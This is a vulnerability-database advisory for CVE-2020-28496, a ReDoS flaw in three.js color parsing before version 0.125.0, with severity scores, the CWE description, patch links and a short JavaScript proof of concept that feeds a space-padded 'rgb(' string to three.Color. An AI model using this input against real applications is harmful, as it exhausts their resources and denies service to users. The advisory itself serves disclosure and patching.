Vulnerability Details : CVE-2020-28496
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Products affected by CVE-2020-28496
- cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:*
Exploit prediction scoring system (EPSS) score for CVE-2020-28496
0.32%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 67 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2020-28496
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
5.0
|
MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
10.0
|
2.9
|
NIST | |
7.5
|
HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
3.9
|
3.6
|
NIST | |
7.5
|
HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
3.9
|
3.6
|
Snyk |
CWE ids for CVE-2020-28496
-
The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.Assigned by: nvd@nist.gov (Primary)
References for CVE-2020-28496
-
https://github.com/mrdoob/three.js/issues/21132
ReDoS in three · Issue #21132 · mrdoob/three.js · GitHubExploit;Issue Tracking;Third Party Advisory
-
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972
Regular Expression Denial of Service (ReDoS) in org.webjars.npm:three | SnykExploit;Third Party Advisory
-
https://snyk.io/vuln/SNYK-JS-THREE-1064931
Regular Expression Denial of Service (ReDoS) in three | SnykExploit;Third Party Advisory
-
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
Color: Fix ReDoS in setStyle by yetingli · Pull Request #21143 · mrdoob/three.js · GitHubPatch;Third Party Advisory
Jump to